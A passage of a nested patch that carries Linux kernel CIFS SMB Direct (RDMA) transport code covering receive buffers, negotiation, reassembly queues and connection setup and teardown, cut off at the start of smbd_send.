+-static int smbd_post_recv(
+-		struct smbd_connection *info, struct smbd_response *response)
+-{
+-	struct ib_recv_wr recv_wr;
+-	int rc = -EIO;
+-
+-	response->sge.addr = ib_dma_map_single(
+-				info->id->device, response->packet,
+-				info->max_receive_size, DMA_FROM_DEVICE);
+-	if (ib_dma_mapping_error(info->id->device, response->sge.addr))
+-		return rc;
+-
+-	response->sge.length = info->max_receive_size;
+-	response->sge.lkey = info->pd->local_dma_lkey;
+-
+-	response->cqe.done = recv_done;
+-
+-	recv_wr.wr_cqe = &response->cqe;
+-	recv_wr.next = NULL;
+-	recv_wr.sg_list = &response->sge;
+-	recv_wr.num_sge = 1;
+-
+-	rc = ib_post_recv(info->id->qp, &recv_wr, NULL);
+-	if (rc) {
+-		ib_dma_unmap_single(info->id->device, response->sge.addr,
+-				    response->sge.length, DMA_FROM_DEVICE);
+-		smbd_disconnect_rdma_connection(info);
+-		log_rdma_recv(ERR, "ib_post_recv failed rc=%d\n", rc);
+-	}
+-
+-	return rc;
+-}
+-
+-/* Perform SMBD negotiate according to [MS-SMBD] 3.1.5.2 */
+-static int smbd_negotiate(struct smbd_connection *info)
+-{
+-	int rc;
+-	struct smbd_response *response = get_receive_buffer(info);
+-
+-	response->type = SMBD_NEGOTIATE_RESP;
+-	rc = smbd_post_recv(info, response);
+-	log_rdma_event(INFO, "smbd_post_recv rc=%d iov.addr=0x%llx iov.length=%u iov.lkey=0x%x\n",
+-		       rc, response->sge.addr,
+-		       response->sge.length, response->sge.lkey);
+-	if (rc)
+-		return rc;
+-
+-	init_completion(&info->negotiate_completion);
+-	info->negotiate_done = false;
+-	rc = smbd_post_send_negotiate_req(info);
+-	if (rc)
+-		return rc;
+-
+-	rc = wait_for_completion_interruptible_timeout(
+-		&info->negotiate_completion, SMBD_NEGOTIATE_TIMEOUT * HZ);
+-	log_rdma_event(INFO, "wait_for_completion_timeout rc=%d\n", rc);
+-
+-	if (info->negotiate_done)
+-		return 0;
+-
+-	if (rc == 0)
+-		rc = -ETIMEDOUT;
+-	else if (rc == -ERESTARTSYS)
+-		rc = -EINTR;
+-	else
+-		rc = -ENOTCONN;
+-
+-	return rc;
+-}
+-
+-static void put_empty_packet(
+-		struct smbd_connection *info, struct smbd_response *response)
+-{
+-	spin_lock(&info->empty_packet_queue_lock);
+-	list_add_tail(&response->list, &info->empty_packet_queue);
+-	info->count_empty_packet_queue++;
+-	spin_unlock(&info->empty_packet_queue_lock);
+-
+-	queue_work(info->workqueue, &info->post_send_credits_work);
+-}
+-
+-/*
+- * Implement Connection.FragmentReassemblyBuffer defined in [MS-SMBD] 3.1.1.1
+- * This is a queue for reassembling upper layer payload and present to upper
+- * layer. All the inncoming payload go to the reassembly queue, regardless of
+- * if reassembly is required. The uuper layer code reads from the queue for all
+- * incoming payloads.
+- * Put a received packet to the reassembly queue
+- * response: the packet received
+- * data_length: the size of payload in this packet
+- */
+-static void enqueue_reassembly(
+-	struct smbd_connection *info,
+-	struct smbd_response *response,
+-	int data_length)
+-{
+-	spin_lock(&info->reassembly_queue_lock);
+-	list_add_tail(&response->list, &info->reassembly_queue);
+-	info->reassembly_queue_length++;
+-	/*
+-	 * Make sure reassembly_data_length is updated after list and
+-	 * reassembly_queue_length are updated. On the dequeue side
+-	 * reassembly_data_length is checked without a lock to determine
+-	 * if reassembly_queue_length and list is up to date
+-	 */
+-	virt_wmb();
+-	info->reassembly_data_length += data_length;
+-	spin_unlock(&info->reassembly_queue_lock);
+-	info->count_reassembly_queue++;
+-	info->count_enqueue_reassembly_queue++;
+-}
+-
+-/*
+- * Get the first entry at the front of reassembly queue
+- * Caller is responsible for locking
+- * return value: the first entry if any, NULL if queue is empty
+- */
+-static struct smbd_response *_get_first_reassembly(struct smbd_connection *info)
+-{
+-	struct smbd_response *ret = NULL;
+-
+-	if (!list_empty(&info->reassembly_queue)) {
+-		ret = list_first_entry(
+-			&info->reassembly_queue,
+-			struct smbd_response, list);
+-	}
+-	return ret;
+-}
+-
+-static struct smbd_response *get_empty_queue_buffer(
+-		struct smbd_connection *info)
+-{
+-	struct smbd_response *ret = NULL;
+-	unsigned long flags;
+-
+-	spin_lock_irqsave(&info->empty_packet_queue_lock, flags);
+-	if (!list_empty(&info->empty_packet_queue)) {
+-		ret = list_first_entry(
+-			&info->empty_packet_queue,
+-			struct smbd_response, list);
+-		list_del(&ret->list);
+-		info->count_empty_packet_queue--;
+-	}
+-	spin_unlock_irqrestore(&info->empty_packet_queue_lock, flags);
+-
+-	return ret;
+-}
+-
+-/*
+- * Get a receive buffer
+- * For each remote send, we need to post a receive. The receive buffers are
+- * pre-allocated in advance.
+- * return value: the receive buffer, NULL if none is available
+- */
+-static struct smbd_response *get_receive_buffer(struct smbd_connection *info)
+-{
+-	struct smbd_response *ret = NULL;
+-	unsigned long flags;
+-
+-	spin_lock_irqsave(&info->receive_queue_lock, flags);
+-	if (!list_empty(&info->receive_queue)) {
+-		ret = list_first_entry(
+-			&info->receive_queue,
+-			struct smbd_response, list);
+-		list_del(&ret->list);
+-		info->count_receive_queue--;
+-		info->count_get_receive_buffer++;
+-	}
+-	spin_unlock_irqrestore(&info->receive_queue_lock, flags);
+-
+-	return ret;
+-}
+-
+-/*
+- * Return a receive buffer
+- * Upon returning of a receive buffer, we can post new receive and extend
+- * more receive credits to remote peer. This is done immediately after a
+- * receive buffer is returned.
+- */
+-static void put_receive_buffer(
+-	struct smbd_connection *info, struct smbd_response *response)
+-{
+-	unsigned long flags;
+-
+-	ib_dma_unmap_single(info->id->device, response->sge.addr,
+-		response->sge.length, DMA_FROM_DEVICE);
+-
+-	spin_lock_irqsave(&info->receive_queue_lock, flags);
+-	list_add_tail(&response->list, &info->receive_queue);
+-	info->count_receive_queue++;
+-	info->count_put_receive_buffer++;
+-	spin_unlock_irqrestore(&info->receive_queue_lock, flags);
+-
+-	queue_work(info->workqueue, &info->post_send_credits_work);
+-}
+-
+-/* Preallocate all receive buffer on transport establishment */
+-static int allocate_receive_buffers(struct smbd_connection *info, int num_buf)
+-{
+-	int i;
+-	struct smbd_response *response;
+-
+-	INIT_LIST_HEAD(&info->reassembly_queue);
+-	spin_lock_init(&info->reassembly_queue_lock);
+-	info->reassembly_data_length = 0;
+-	info->reassembly_queue_length = 0;
+-
+-	INIT_LIST_HEAD(&info->receive_queue);
+-	spin_lock_init(&info->receive_queue_lock);
+-	info->count_receive_queue = 0;
+-
+-	INIT_LIST_HEAD(&info->empty_packet_queue);
+-	spin_lock_init(&info->empty_packet_queue_lock);
+-	info->count_empty_packet_queue = 0;
+-
+-	init_waitqueue_head(&info->wait_receive_queues);
+-
+-	for (i = 0; i < num_buf; i++) {
+-		response = mempool_alloc(info->response_mempool, GFP_KERNEL);
+-		if (!response)
+-			goto allocate_failed;
+-
+-		response->info = info;
+-		list_add_tail(&response->list, &info->receive_queue);
+-		info->count_receive_queue++;
+-	}
+-
+-	return 0;
+-
+-allocate_failed:
+-	while (!list_empty(&info->receive_queue)) {
+-		response = list_first_entry(
+-				&info->receive_queue,
+-				struct smbd_response, list);
+-		list_del(&response->list);
+-		info->count_receive_queue--;
+-
+-		mempool_free(response, info->response_mempool);
+-	}
+-	return -ENOMEM;
+-}
+-
+-static void destroy_receive_buffers(struct smbd_connection *info)
+-{
+-	struct smbd_response *response;
+-
+-	while ((response = get_receive_buffer(info)))
+-		mempool_free(response, info->response_mempool);
+-
+-	while ((response = get_empty_queue_buffer(info)))
+-		mempool_free(response, info->response_mempool);
+-}
+-
+-/* Implement idle connection timer [MS-SMBD] 3.1.6.2 */
+-static void idle_connection_timer(struct work_struct *work)
+-{
+-	struct smbd_connection *info = container_of(
+-					work, struct smbd_connection,
+-					idle_timer_work.work);
+-
+-	if (info->keep_alive_requested != KEEP_ALIVE_NONE) {
+-		log_keep_alive(ERR,
+-			"error status info->keep_alive_requested=%d\n",
+-			info->keep_alive_requested);
+-		smbd_disconnect_rdma_connection(info);
+-		return;
+-	}
+-
+-	log_keep_alive(INFO, "about to send an empty idle message\n");
+-	smbd_post_send_empty(info);
+-
+-	/* Setup the next idle timeout work */
+-	queue_delayed_work(info->workqueue, &info->idle_timer_work,
+-			info->keep_alive_interval*HZ);
+-}
+-
+-/*
+- * Destroy the transport and related RDMA and memory resources
+- * Need to go through all the pending counters and make sure on one is using
+- * the transport while it is destroyed
+- */
+-void smbd_destroy(struct TCP_Server_Info *server)
+-{
+-	struct smbd_connection *info = server->smbd_conn;
+-	struct smbd_response *response;
+-	unsigned long flags;
+-
+-	if (!info) {
+-		log_rdma_event(INFO, "rdma session already destroyed\n");
+-		return;
+-	}
+-
+-	log_rdma_event(INFO, "destroying rdma session\n");
+-	if (info->transport_status != SMBD_DISCONNECTED) {
+-		rdma_disconnect(server->smbd_conn->id);
+-		log_rdma_event(INFO, "wait for transport being disconnected\n");
+-		wait_event_interruptible(
+-			info->disconn_wait,
+-			info->transport_status == SMBD_DISCONNECTED);
+-	}
+-
+-	log_rdma_event(INFO, "destroying qp\n");
+-	ib_drain_qp(info->id->qp);
+-	rdma_destroy_qp(info->id);
+-
+-	log_rdma_event(INFO, "cancelling idle timer\n");
+-	cancel_delayed_work_sync(&info->idle_timer_work);
+-
+-	log_rdma_event(INFO, "wait for all send posted to IB to finish\n");
+-	wait_event(info->wait_send_pending,
+-		atomic_read(&info->send_pending) == 0);
+-
+-	/* It's not possible for upper layer to get to reassembly */
+-	log_rdma_event(INFO, "drain the reassembly queue\n");
+-	do {
+-		spin_lock_irqsave(&info->reassembly_queue_lock, flags);
+-		response = _get_first_reassembly(info);
+-		if (response) {
+-			list_del(&response->list);
+-			spin_unlock_irqrestore(
+-				&info->reassembly_queue_lock, flags);
+-			put_receive_buffer(info, response);
+-		} else
+-			spin_unlock_irqrestore(
+-				&info->reassembly_queue_lock, flags);
+-	} while (response);
+-	info->reassembly_data_length = 0;
+-
+-	log_rdma_event(INFO, "free receive buffers\n");
+-	wait_event(info->wait_receive_queues,
+-		info->count_receive_queue + info->count_empty_packet_queue
+-			== info->receive_credit_max);
+-	destroy_receive_buffers(info);
+-
+-	/*
+-	 * For performance reasons, memory registration and deregistration
+-	 * are not locked by srv_mutex. It is possible some processes are
+-	 * blocked on transport srv_mutex while holding memory registration.
+-	 * Release the transport srv_mutex to allow them to hit the failure
+-	 * path when sending data, and then release memory registartions.
+-	 */
+-	log_rdma_event(INFO, "freeing mr list\n");
+-	wake_up_interruptible_all(&info->wait_mr);
+-	while (atomic_read(&info->mr_used_count)) {
+-		cifs_server_unlock(server);
+-		msleep(1000);
+-		cifs_server_lock(server);
+-	}
+-	destroy_mr_list(info);
+-
+-	ib_free_cq(info->send_cq);
+-	ib_free_cq(info->recv_cq);
+-	ib_dealloc_pd(info->pd);
+-	rdma_destroy_id(info->id);
+-
+-	/* free mempools */
+-	mempool_destroy(info->request_mempool);
+-	kmem_cache_destroy(info->request_cache);
+-
+-	mempool_destroy(info->response_mempool);
+-	kmem_cache_destroy(info->response_cache);
+-
+-	info->transport_status = SMBD_DESTROYED;
+-
+-	destroy_workqueue(info->workqueue);
+-	log_rdma_event(INFO,  "rdma session destroyed\n");
+-	kfree(info);
+-	server->smbd_conn = NULL;
+-}
+-
+-/*
+- * Reconnect this SMBD connection, called from upper layer
+- * return value: 0 on success, or actual error code
+- */
+-int smbd_reconnect(struct TCP_Server_Info *server)
+-{
+-	log_rdma_event(INFO, "reconnecting rdma session\n");
+-
+-	if (!server->smbd_conn) {
+-		log_rdma_event(INFO, "rdma session already destroyed\n");
+-		goto create_conn;
+-	}
+-
+-	/*
+-	 * This is possible if transport is disconnected and we haven't received
+-	 * notification from RDMA, but upper layer has detected timeout
+-	 */
+-	if (server->smbd_conn->transport_status == SMBD_CONNECTED) {
+-		log_rdma_event(INFO, "disconnecting transport\n");
+-		smbd_destroy(server);
+-	}
+-
+-create_conn:
+-	log_rdma_event(INFO, "creating rdma session\n");
+-	server->smbd_conn = smbd_get_connection(
+-		server, (struct sockaddr *) &server->dstaddr);
+-
+-	if (server->smbd_conn)
+-		cifs_dbg(VFS, "RDMA transport re-established\n");
+-
+-	return server->smbd_conn ? 0 : -ENOENT;
+-}
+-
+-static void destroy_caches_and_workqueue(struct smbd_connection *info)
+-{
+-	destroy_receive_buffers(info);
+-	destroy_workqueue(info->workqueue);
+-	mempool_destroy(info->response_mempool);
+-	kmem_cache_destroy(info->response_cache);
+-	mempool_destroy(info->request_mempool);
+-	kmem_cache_destroy(info->request_cache);
+-}
+-
+-#define MAX_NAME_LEN	80
+-static int allocate_caches_and_workqueue(struct smbd_connection *info)
+-{
+-	char name[MAX_NAME_LEN];
+-	int rc;
+-
+-	scnprintf(name, MAX_NAME_LEN, "smbd_request_%p", info);
+-	info->request_cache =
+-		kmem_cache_create(
+-			name,
+-			sizeof(struct smbd_request) +
+-				sizeof(struct smbd_data_transfer),
+-			0, SLAB_HWCACHE_ALIGN, NULL);
+-	if (!info->request_cache)
+-		return -ENOMEM;
+-
+-	info->request_mempool =
+-		mempool_create(info->send_credit_target, mempool_alloc_slab,
+-			mempool_free_slab, info->request_cache);
+-	if (!info->request_mempool)
+-		goto out1;
+-
+-	scnprintf(name, MAX_NAME_LEN, "smbd_response_%p", info);
+-	info->response_cache =
+-		kmem_cache_create(
+-			name,
+-			sizeof(struct smbd_response) +
+-				info->max_receive_size,
+-			0, SLAB_HWCACHE_ALIGN, NULL);
+-	if (!info->response_cache)
+-		goto out2;
+-
+-	info->response_mempool =
+-		mempool_create(info->receive_credit_max, mempool_alloc_slab,
+-		       mempool_free_slab, info->response_cache);
+-	if (!info->response_mempool)
+-		goto out3;
+-
+-	scnprintf(name, MAX_NAME_LEN, "smbd_%p", info);
+-	info->workqueue = create_workqueue(name);
+-	if (!info->workqueue)
+-		goto out4;
+-
+-	rc = allocate_receive_buffers(info, info->receive_credit_max);
+-	if (rc) {
+-		log_rdma_event(ERR, "failed to allocate receive buffers\n");
+-		goto out5;
+-	}
+-
+-	return 0;
+-
+-out5:
+-	destroy_workqueue(info->workqueue);
+-out4:
+-	mempool_destroy(info->response_mempool);
+-out3:
+-	kmem_cache_destroy(info->response_cache);
+-out2:
+-	mempool_destroy(info->request_mempool);
+-out1:
+-	kmem_cache_destroy(info->request_cache);
+-	return -ENOMEM;
+-}
+-
+-/* Create a SMBD connection, called by upper layer */
+-static struct smbd_connection *_smbd_get_connection(
+-	struct TCP_Server_Info *server, struct sockaddr *dstaddr, int port)
+-{
+-	int rc;
+-	struct smbd_connection *info;
+-	struct rdma_conn_param conn_param;
+-	struct ib_qp_init_attr qp_attr;
+-	struct sockaddr_in *addr_in = (struct sockaddr_in *) dstaddr;
+-	struct ib_port_immutable port_immutable;
+-	u32 ird_ord_hdr[2];
+-
+-	info = kzalloc(sizeof(struct smbd_connection), GFP_KERNEL);
+-	if (!info)
+-		return NULL;
+-
+-	info->transport_status = SMBD_CONNECTING;
+-	rc = smbd_ia_open(info, dstaddr, port);
+-	if (rc) {
+-		log_rdma_event(INFO, "smbd_ia_open rc=%d\n", rc);
+-		goto create_id_failed;
+-	}
+-
+-	if (smbd_send_credit_target > info->id->device->attrs.max_cqe ||
+-	    smbd_send_credit_target > info->id->device->attrs.max_qp_wr) {
+-		log_rdma_event(ERR, "consider lowering send_credit_target = %d. Possible CQE overrun, device reporting max_cqe %d max_qp_wr %d\n",
+-			       smbd_send_credit_target,
+-			       info->id->device->attrs.max_cqe,
+-			       info->id->device->attrs.max_qp_wr);
+-		goto config_failed;
+-	}
+-
+-	if (smbd_receive_credit_max > info->id->device->attrs.max_cqe ||
+-	    smbd_receive_credit_max > info->id->device->attrs.max_qp_wr) {
+-		log_rdma_event(ERR, "consider lowering receive_credit_max = %d. Possible CQE overrun, device reporting max_cqe %d max_qp_wr %d\n",
+-			       smbd_receive_credit_max,
+-			       info->id->device->attrs.max_cqe,
+-			       info->id->device->attrs.max_qp_wr);
+-		goto config_failed;
+-	}
+-
+-	info->receive_credit_max = smbd_receive_credit_max;
+-	info->send_credit_target = smbd_send_credit_target;
+-	info->max_send_size = smbd_max_send_size;
+-	info->max_fragmented_recv_size = smbd_max_fragmented_recv_size;
+-	info->max_receive_size = smbd_max_receive_size;
+-	info->keep_alive_interval = smbd_keep_alive_interval;
+-
+-	if (info->id->device->attrs.max_send_sge < SMBDIRECT_MAX_SEND_SGE ||
+-	    info->id->device->attrs.max_recv_sge < SMBDIRECT_MAX_RECV_SGE) {
+-		log_rdma_event(ERR,
+-			"device %.*s max_send_sge/max_recv_sge = %d/%d too small\n",
+-			IB_DEVICE_NAME_MAX,
+-			info->id->device->name,
+-			info->id->device->attrs.max_send_sge,
+-			info->id->device->attrs.max_recv_sge);
+-		goto config_failed;
+-	}
+-
+-	info->send_cq = NULL;
+-	info->recv_cq = NULL;
+-	info->send_cq =
+-		ib_alloc_cq_any(info->id->device, info,
+-				info->send_credit_target, IB_POLL_SOFTIRQ);
+-	if (IS_ERR(info->send_cq)) {
+-		info->send_cq = NULL;
+-		goto alloc_cq_failed;
+-	}
+-
+-	info->recv_cq =
+-		ib_alloc_cq_any(info->id->device, info,
+-				info->receive_credit_max, IB_POLL_SOFTIRQ);
+-	if (IS_ERR(info->recv_cq)) {
+-		info->recv_cq = NULL;
+-		goto alloc_cq_failed;
+-	}
+-
+-	memset(&qp_attr, 0, sizeof(qp_attr));
+-	qp_attr.event_handler = smbd_qp_async_error_upcall;
+-	qp_attr.qp_context = info;
+-	qp_attr.cap.max_send_wr = info->send_credit_target;
+-	qp_attr.cap.max_recv_wr = info->receive_credit_max;
+-	qp_attr.cap.max_send_sge = SMBDIRECT_MAX_SEND_SGE;
+-	qp_attr.cap.max_recv_sge = SMBDIRECT_MAX_RECV_SGE;
+-	qp_attr.cap.max_inline_data = 0;
+-	qp_attr.sq_sig_type = IB_SIGNAL_REQ_WR;
+-	qp_attr.qp_type = IB_QPT_RC;
+-	qp_attr.send_cq = info->send_cq;
+-	qp_attr.recv_cq = info->recv_cq;
+-	qp_attr.port_num = ~0;
+-
+-	rc = rdma_create_qp(info->id, info->pd, &qp_attr);
+-	if (rc) {
+-		log_rdma_event(ERR, "rdma_create_qp failed %i\n", rc);
+-		goto create_qp_failed;
+-	}
+-
+-	memset(&conn_param, 0, sizeof(conn_param));
+-	conn_param.initiator_depth = 0;
+-
+-	conn_param.responder_resources =
+-		info->id->device->attrs.max_qp_rd_atom
+-			< SMBD_CM_RESPONDER_RESOURCES ?
+-		info->id->device->attrs.max_qp_rd_atom :
+-		SMBD_CM_RESPONDER_RESOURCES;
+-	info->responder_resources = conn_param.responder_resources;
+-	log_rdma_mr(INFO, "responder_resources=%d\n",
+-		info->responder_resources);
+-
+-	/* Need to send IRD/ORD in private data for iWARP */
+-	info->id->device->ops.get_port_immutable(
+-		info->id->device, info->id->port_num, &port_immutable);
+-	if (port_immutable.core_cap_flags & RDMA_CORE_PORT_IWARP) {
+-		ird_ord_hdr[0] = info->responder_resources;
+-		ird_ord_hdr[1] = 1;
+-		conn_param.private_data = ird_ord_hdr;
+-		conn_param.private_data_len = sizeof(ird_ord_hdr);
+-	} else {
+-		conn_param.private_data = NULL;
+-		conn_param.private_data_len = 0;
+-	}
+-
+-	conn_param.retry_count = SMBD_CM_RETRY;
+-	conn_param.rnr_retry_count = SMBD_CM_RNR_RETRY;
+-	conn_param.flow_control = 0;
+-
+-	log_rdma_event(INFO, "connecting to IP %pI4 port %d\n",
+-		&addr_in->sin_addr, port);
+-
+-	init_waitqueue_head(&info->conn_wait);
+-	init_waitqueue_head(&info->disconn_wait);
+-	init_waitqueue_head(&info->wait_reassembly_queue);
+-	rc = rdma_connect(info->id, &conn_param);
+-	if (rc) {
+-		log_rdma_event(ERR, "rdma_connect() failed with %i\n", rc);
+-		goto rdma_connect_failed;
+-	}
+-
+-	wait_event_interruptible(
+-		info->conn_wait, info->transport_status != SMBD_CONNECTING);
+-
+-	if (info->transport_status != SMBD_CONNECTED) {
+-		log_rdma_event(ERR, "rdma_connect failed port=%d\n", port);
+-		goto rdma_connect_failed;
+-	}
+-
+-	log_rdma_event(INFO, "rdma_connect connected\n");
+-
+-	rc = allocate_caches_and_workqueue(info);
+-	if (rc) {
+-		log_rdma_event(ERR, "cache allocation failed\n");
+-		goto allocate_cache_failed;
+-	}
+-
+-	init_waitqueue_head(&info->wait_send_queue);
+-	INIT_DELAYED_WORK(&info->idle_timer_work, idle_connection_timer);
+-	queue_delayed_work(info->workqueue, &info->idle_timer_work,
+-		info->keep_alive_interval*HZ);
+-
+-	init_waitqueue_head(&info->wait_send_pending);
+-	atomic_set(&info->send_pending, 0);
+-
+-	init_waitqueue_head(&info->wait_post_send);
+-
+-	INIT_WORK(&info->disconnect_work, smbd_disconnect_rdma_work);
+-	INIT_WORK(&info->post_send_credits_work, smbd_post_send_credits);
+-	info->new_credits_offered = 0;
+-	spin_lock_init(&info->lock_new_credits_offered);
+-
+-	rc = smbd_negotiate(info);
+-	if (rc) {
+-		log_rdma_event(ERR, "smbd_negotiate rc=%d\n", rc);
+-		goto negotiation_failed;
+-	}
+-
+-	rc = allocate_mr_list(info);
+-	if (rc) {
+-		log_rdma_mr(ERR, "memory registration allocation failed\n");
+-		goto allocate_mr_failed;
+-	}
+-
+-	return info;
+-
+-allocate_mr_failed:
+-	/* At this point, need to a full transport shutdown */
+-	server->smbd_conn = info;
+-	smbd_destroy(server);
+-	return NULL;
+-
+-negotiation_failed:
+-	cancel_delayed_work_sync(&info->idle_timer_work);
+-	destroy_caches_and_workqueue(info);
+-	info->transport_status = SMBD_NEGOTIATE_FAILED;
+-	init_waitqueue_head(&info->conn_wait);
+-	rdma_disconnect(info->id);
+-	wait_event(info->conn_wait,
+-		info->transport_status == SMBD_DISCONNECTED);
+-
+-allocate_cache_failed:
+-rdma_connect_failed:
+-	rdma_destroy_qp(info->id);
+-
+-create_qp_failed:
+-alloc_cq_failed:
+-	if (info->send_cq)
+-		ib_free_cq(info->send_cq);
+-	if (info->recv_cq)
+-		ib_free_cq(info->recv_cq);
+-
+-config_failed:
+-	ib_dealloc_pd(info->pd);
+-	rdma_destroy_id(info->id);
+-
+-create_id_failed:
+-	kfree(info);
+-	return NULL;
+-}
+-
+-struct smbd_connection *smbd_get_connection(
+-	struct TCP_Server_Info *server, struct sockaddr *dstaddr)
+-{
+-	struct smbd_connection *ret;
+-	int port = SMBD_PORT;
+-
+-try_again:
+-	ret = _smbd_get_connection(server, dstaddr, port);
+-
+-	/* Try SMB_PORT if SMBD_PORT doesn't work */
+-	if (!ret && port == SMBD_PORT) {
+-		port = SMB_PORT;
+-		goto try_again;
+-	}
+-	return ret;
+-}
+-
+-/*
+- * Receive data from receive reassembly queue
+- * All the incoming data packets are placed in reassembly queue
+- * buf: the buffer to read data into
+- * size: the length of data to read
+- * return value: actual data read
+- * Note: this implementation copies the data from reassebmly queue to receive
+- * buffers used by upper layer. This is not the optimal code path. A better way
+- * to do it is to not have upper layer allocate its receive buffers but rather
+- * borrow the buffer from reassembly queue, and return it after data is
+- * consumed. But this will require more changes to upper layer code, and also
+- * need to consider packet boundaries while they still being reassembled.
+- */
+-static int smbd_recv_buf(struct smbd_connection *info, char *buf,
+-		unsigned int size)
+-{
+-	struct smbd_response *response;
+-	struct smbd_data_transfer *data_transfer;
+-	int to_copy, to_read, data_read, offset;
+-	u32 data_length, remaining_data_length, data_offset;
+-	int rc;
+-
+-again:
+-	/*
+-	 * No need to hold the reassembly queue lock all the time as we are
+-	 * the only one reading from the front of the queue. The transport
+-	 * may add more entries to the back of the queue at the same time
+-	 */
+-	log_read(INFO, "size=%d info->reassembly_data_length=%d\n", size,
+-		info->reassembly_data_length);
+-	if (info->reassembly_data_length >= size) {
+-		int queue_length;
+-		int queue_removed = 0;
+-
+-		/*
+-		 * Need to make sure reassembly_data_length is read before
+-		 * reading reassembly_queue_length and calling
+-		 * _get_first_reassembly. This call is lock free
+-		 * as we never read at the end of the queue which are being
+-		 * updated in SOFTIRQ as more data is received
+-		 */
+-		virt_rmb();
+-		queue_length = info->reassembly_queue_length;
+-		data_read = 0;
+-		to_read = size;
+-		offset = info->first_entry_offset;
+-		while (data_read < size) {
+-			response = _get_first_reassembly(info);
+-			data_transfer = smbd_response_payload(response);
+-			data_length = le32_to_cpu(data_transfer->data_length);
+-			remaining_data_length =
+-				le32_to_cpu(
+-					data_transfer->remaining_data_length);
+-			data_offset = le32_to_cpu(data_transfer->data_offset);
+-
+-			/*
+-			 * The upper layer expects RFC1002 length at the
+-			 * beginning of the payload. Return it to indicate
+-			 * the total length of the packet. This minimize the
+-			 * change to upper layer packet processing logic. This
+-			 * will be eventually remove when an intermediate
+-			 * transport layer is added
+-			 */
+-			if (response->first_segment && size == 4) {
+-				unsigned int rfc1002_len =
+-					data_length + remaining_data_length;
+-				*((__be32 *)buf) = cpu_to_be32(rfc1002_len);
+-				data_read = 4;
+-				response->first_segment = false;
+-				log_read(INFO, "returning rfc1002 length %d\n",
+-					rfc1002_len);
+-				goto read_rfc1002_done;
+-			}
+-
+-			to_copy = min_t(int, data_length - offset, to_read);
+-			memcpy(
+-				buf + data_read,
+-				(char *)data_transfer + data_offset + offset,
+-				to_copy);
+-
+-			/* move on to the next buffer? */
+-			if (to_copy == data_length - offset) {
+-				queue_length--;
+-				/*
+-				 * No need to lock if we are not at the
+-				 * end of the queue
+-				 */
+-				if (queue_length)
+-					list_del(&response->list);
+-				else {
+-					spin_lock_irq(
+-						&info->reassembly_queue_lock);
+-					list_del(&response->list);
+-					spin_unlock_irq(
+-						&info->reassembly_queue_lock);
+-				}
+-				queue_removed++;
+-				info->count_reassembly_queue--;
+-				info->count_dequeue_reassembly_queue++;
+-				put_receive_buffer(info, response);
+-				offset = 0;
+-				log_read(INFO, "put_receive_buffer offset=0\n");
+-			} else
+-				offset += to_copy;
+-
+-			to_read -= to_copy;
+-			data_read += to_copy;
+-
+-			log_read(INFO, "_get_first_reassembly memcpy %d bytes data_transfer_length-offset=%d after that to_read=%d data_read=%d offset=%d\n",
+-				 to_copy, data_length - offset,
+-				 to_read, data_read, offset);
+-		}
+-
+-		spin_lock_irq(&info->reassembly_queue_lock);
+-		info->reassembly_data_length -= data_read;
+-		info->reassembly_queue_length -= queue_removed;
+-		spin_unlock_irq(&info->reassembly_queue_lock);
+-
+-		info->first_entry_offset = offset;
+-		log_read(INFO, "returning to thread data_read=%d reassembly_data_length=%d first_entry_offset=%d\n",
+-			 data_read, info->reassembly_data_length,
+-			 info->first_entry_offset);
+-read_rfc1002_done:
+-		return data_read;
+-	}
+-
+-	log_read(INFO, "wait_event on more data\n");
+-	rc = wait_event_interruptible(
+-		info->wait_reassembly_queue,
+-		info->reassembly_data_length >= size ||
+-			info->transport_status != SMBD_CONNECTED);
+-	/* Don't return any data if interrupted */
+-	if (rc)
+-		return rc;
+-
+-	if (info->transport_status != SMBD_CONNECTED) {
+-		log_read(ERR, "disconnected\n");
+-		return -ECONNABORTED;
+-	}
+-
+-	goto again;
+-}
+-
+-/*
+- * Receive a page from receive reassembly queue
+- * page: the page to read data into
+- * to_read: the length of data to read
+- * return value: actual data read
+- */
+-static int smbd_recv_page(struct smbd_connection *info,
+-		struct page *page, unsigned int page_offset,
+-		unsigned int to_read)
+-{
+-	int ret;
+-	char *to_address;
+-	void *page_address;
+-
+-	/* make sure we have the page ready for read */
+-	ret = wait_event_interruptible(
+-		info->wait_reassembly_queue,
+-		info->reassembly_data_length >= to_read ||
+-			info->transport_status != SMBD_CONNECTED);
+-	if (ret)
+-		return ret;
+-
+-	/* now we can read from reassembly queue and not sleep */
+-	page_address = kmap_atomic(page);
+-	to_address = (char *) page_address + page_offset;
+-
+-	log_read(INFO, "reading from page=%p address=%p to_read=%d\n",
+-		page, to_address, to_read);
+-
+-	ret = smbd_recv_buf(info, to_address, to_read);
+-	kunmap_atomic(page_address);
+-
+-	return ret;
+-}
+-
+-/*
+- * Receive data from transport
+- * msg: a msghdr point to the buffer, can be ITER_KVEC or ITER_BVEC
+- * return: total bytes read, or 0. SMB Direct will not do partial read.
+- */
+-int smbd_recv(struct smbd_connection *info, struct msghdr *msg)
+-{
+-	char *buf;
+-	struct page *page;
+-	unsigned int to_read, page_offset;
+-	int rc;
+-
+-	if (iov_iter_rw(&msg->msg_iter) == WRITE) {
+-		/* It's a bug in upper layer to get there */
+-		cifs_dbg(VFS, "Invalid msg iter dir %u\n",
+-			 iov_iter_rw(&msg->msg_iter));
+-		rc = -EINVAL;
+-		goto out;
+-	}
+-
+-	switch (iov_iter_type(&msg->msg_iter)) {
+-	case ITER_KVEC:
+-		buf = msg->msg_iter.kvec->iov_base;
+-		to_read = msg->msg_iter.kvec->iov_len;
+-		rc = smbd_recv_buf(info, buf, to_read);
+-		break;
+-
+-	case ITER_BVEC:
+-		page = msg->msg_iter.bvec->bv_page;
+-		page_offset = msg->msg_iter.bvec->bv_offset;
+-		to_read = msg->msg_iter.bvec->bv_len;
+-		rc = smbd_recv_page(info, page, page_offset, to_read);
+-		break;
+-
+-	default:
+-		/* It's a bug in upper layer to get there */
+-		cifs_dbg(VFS, "Invalid msg type %d\n",
+-			 iov_iter_type(&msg->msg_iter));
+-		rc = -EINVAL;
+-	}
+-
+-out:
+-	/* SMBDirect will read it all or nothing */
+-	if (rc > 0)
+-		msg->msg_iter.count = 0;
+-	return rc;
+-}
+-
+-/*
+- * Send data to transport
+- * Each rqst is transported as a SMBDirect payload
+- * rqst: the data to write
+- * return value: 0 if successfully write, otherwise error code
+- */
+-int smbd_send(struct TCP_Server_Info *server,
+-	int num_rqst, struct smb_rqst *rqst_array)
+-{
+-	struct smbd_connection *info = server->smbd_conn;
+-	struct kvec vecs[SMBDIRECT_MAX_SEND_SGE - 1];
+-	int nvecs;
